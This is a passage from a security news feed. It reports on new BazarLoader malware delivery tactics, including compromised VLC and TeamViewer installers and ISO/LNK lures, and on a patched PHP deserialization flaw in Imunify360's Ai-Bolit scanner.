Previously, BazarLoader relied on a unique delivery mechanism that researchers with Proofpoint said they observed since February, which leveraged a combination of emails and phone-based “customer service representatives” for carrying out attacks. Here, spam emails instructed victims to call a phone number, which led to an attacker-controlled call center that gave victims a URL and directed them to download a malicious file. This tactic also helped attackers bypass email protection filters that would block out malicious links or attachments. Researchers with Palo Alto Network’s Unit 42 team in July also observed BazarLoader spread via a copyright violation-themed campaign using ZIP archives, and through English-language emails sent by the TA551 threat group.

In new attacks, which targeted victims in the Americas, researchers observed BazarLoader attackers expanding their delivery methods to use legitimate, compromised installers - versions of the VLC media player and TeamViewer remote access and remote control software - and convincing victims to download them. After these installers loaded, they dropped a BazarLoader executable, which is another notable difference from recent BazarLoader delivery methods that instead relied on dynamic link libraries (DLLs).

“While the initial delivery mechanism has yet to be identified, it’s possible that the use of these packages are part of a wider social engineering technique to deceive users into downloading and implementing the compromised installers,” said researchers.

“The number of arrival mechanism variations used in BazarLoader campaigns continue to increase as threat actors diversify their attack patterns to evade detection."

Another recently observed delivery method abused ISO files, archive files containing an identical copy (or image) of data found on an optical disc. Here, the abused ISO file would download a Windows link (LNK) and DLL payload. The LNK file used a folder icon on victims’ system in order to deceive them into clicking on the icon; once clicked, the enclosed BazarLoader DLL file would run. The DLL then called an export function previously used by BazarLoader, “EnterDLL,” to load a malicious DLL and communicate with the command-and-control (C2) server. This then spawned a suspended Microsoft Edge process to inject itself into it, said researchers.

While neither of these two techniques are novel, researchers said they indicate how BazarLoader is expanding its delivery capabilities in an effort to sidestep detection.

“For instance, while the use of compromised installers has been observed with other malware, the large file size can still challenge detection solutions — such as sandboxes — which may implement file size limits,” Kenefick said. “On the other hand, LNK files serving as shortcuts will also likely be obfuscated for the additional layers created between the shortcut and the malicious files itself.”

Researchers warn that the loader will continue to evolve, and stress that BazarLoader detections should be prioritized as ransomware attacks continue to pose a challenge to organizations. BazarLoader has several troubling capabilities allowing ransomware affiliates to conduct reconnaissance, including the ability to root out decoy systems or analysis and sandbox environments. Reconnaissance also helps ransomware operators filter infected environments to those more likely to yield a ransom payout.

“The deployment of BazarLoader malware for initial access is a known technique for modern ransomware such as Conti and Ryuk as service affiliates,” said researchers. “Aside from these known ransomware families including more tools for entry into their arsenal, other malware groups and ransomware operators may pick up on the additional means, if they have not already done so.”

<![CDATA[Imunify360 Flaw Can Lead to Code Execution]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/imunify360-flaw-can-lead-to-code-execution https://duo.com/decipher/imunify360-flaw-can-lead-to-code-execution Tue, 23 Nov 2021 00:00:00 -0500

There is a vulnerability in some versions of the Imunify360 web server security platform that can allow an attacker to execute arbitrary code in some specific circumstances.

The vulnerability is a PHP deserialization issue and it exists in versions 5.8 and 5.9 of Imunify360, a product designed to detect malware and other security issues on web-hosting servers. Researchers at Cisco Talos discovered the vulnerability, which is in the Ai-Bolit functionality of the product. The researchers found that an attacker can exploit it in a couple of different ways.

The flaw “could be triggered automatically just after the attacker creates a malicious file in the system if Immunify is configured with real-time file system scanning. It could also be triggered if the user scans a malicious file provided by the attacker with Ai-Bolit scanner. The attacker could cause a deserialization condition with controllable data and then execute arbitrary code,” the Talos advisory says.

The specific component that contains the vulnerability, Ai-Bolit, is installed by default and is meant to scan files for malware. Talos reported the flaw to CloudLinux, which sells Imunify360, and the vendor released fixed versions to address it.

Server administrators running vulnerable versions of Imunify360 should upgrade as soon as possible, especially now that information about the vulnerability is public.